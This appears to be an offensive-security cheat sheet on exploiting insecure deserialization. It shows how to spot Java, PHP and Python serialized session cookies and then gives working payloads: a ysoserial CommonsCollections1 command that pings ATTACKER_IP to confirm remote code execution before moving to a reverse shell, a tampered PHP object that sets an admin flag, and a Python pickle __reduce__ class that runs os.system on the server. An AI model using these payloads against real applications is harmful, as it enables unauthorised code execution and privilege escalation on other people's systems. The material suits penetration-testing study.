DESERIALIZATION

Identify serialized data

Recognize serialization formats — Each format has different attacks

Look for base64 blobs in cookies/params
Java: rO0AB (base64), AC ED 00 05 (hex)
PHP: O:4:"User":2:{...}
Python: (pickle)
Example Output
Cookie: session=rO0ABXNyABFq... (Java - starts with rO0AB)
Cookie: session=Tzo0OiJVc2VyIjoyOntz... (PHP - starts with O:4:)
Cookie: session=gASVKAAAA... (Python pickle - starts with gASV)
(Identify format, then craft exploit)

Java deserialization

Generate Java payload — If Java app with known gadgets

ysoserial.jar CommonsCollections1 'command'
Example Output
java -jar ysoserial.jar CommonsCollections1 'ping ATTACKER_IP' | base64

Replace cookie with payload
Attacker: tcpdump -i tun0 icmp
Got ICMP from 10.10.10.5
(Confirmed RCE, now use reverse shell)

PHP deserialization

Modify serialized cookie — PHP object injection

Craft serialized PHP object with __wakeup or __destruct
Example Output
Original: O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:0;}
Modified: O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}

Set admin=true via deserialization
(Or exploit __wakeup/__destruct for RCE)

Python pickle

Python unpickle RCE — Flask/Django session cookies

import pickle; pickle.loads(malicious_data)
Example Output
import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))
pickle.dumps(Exploit())

Send as session cookie
Server unpickles -> executes os.system('id')
(RCE via Python deserialization)